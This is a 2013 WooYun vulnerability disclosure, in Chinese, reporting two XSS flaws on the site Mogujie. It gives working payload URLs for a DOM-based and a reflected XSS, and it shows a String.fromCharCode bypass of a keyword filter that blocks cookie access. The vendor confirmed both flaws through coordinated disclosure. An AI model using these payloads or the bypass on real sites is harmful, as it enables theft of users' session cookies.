当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-016934

漏洞标题:蘑菇街xss两枚,绕过滤拿妹纸cookie

相关厂商:蘑菇街

漏洞作者: hqdvista

提交时间:2013-01-05 15:30

修复时间:2013-02-19 15:31

公开时间:2013-02-19 15:31

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-05: 细节已通知厂商并且等待厂商处理中
2013-01-05: 厂商已经确认,细节仅向厂商公开
2013-01-15: 细节向核心白帽子及相关领域专家公开
2013-01-25: 细节向普通白帽子公开
2013-02-04: 细节向实习白帽子公开
2013-02-19: 细节向公众公开

简要描述:

蘑菇街xss两枚,可绕过过滤拿妹纸cookie

详细说明:

先来重点的:首先是一个dom型xss,url参数输出在js里面。原始url在http://www.mogujie.com/upload/addpic?callback=parent;prompt(/test/);//&code=3002

Screen Shot 2013-01-03 at 12.28.38 PM.png


刚开始弹窗很容易,可是剑心告诉我们缺乏可以影响他人帐号或数据的证明案例,于是要进一步利用。
果然弹document.cookie就弹不出来了

Screen Shot 2013-01-05 at 3.25.29 AM.png


原来是被卡擦掉了,更换大小写也不行。包括document.write document.body.append都被卡擦掉了。
但是妹纸还是要跨的,怎么绕?用object.func 等同于object["func"],
于是有document.cookie === document[String.fromCharCode(99,111,111,107,105,101)]

Screen Shot 2013-01-05 at 3.29.30 AM.png


成功pia出。
然后构造payload时用document[String.fromCharCode(119,114,105,116,101)] 代替 document.write。
这个网页木有body,所以调用document.body.append会null object... 还是用document.append。
调用外部js效果如下

Screen Shot 2013-01-05 at 3.47.27 AM.png


——————————————
另外一个就是平常的反射xss了,直接弹cookie,木有过滤
http://www.mogujie.com/magic/brand/1qi?keyword=1%3C%2ftitle%3E%3Cscript%3Eprompt%28document.cookie%29%3C/script%3E

Screen Shot 2013-01-05 at 3.35.13 AM.png

漏洞证明:

Screen Shot 2013-01-05 at 3.32.28 AM.png


修复方案:

输出的时候encode一下?

版权声明:转载请注明来源 hqdvista@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2013-01-05 15:35

厂商回复:

谢谢 朋友, 我们尽快修复!

最新状态:

暂无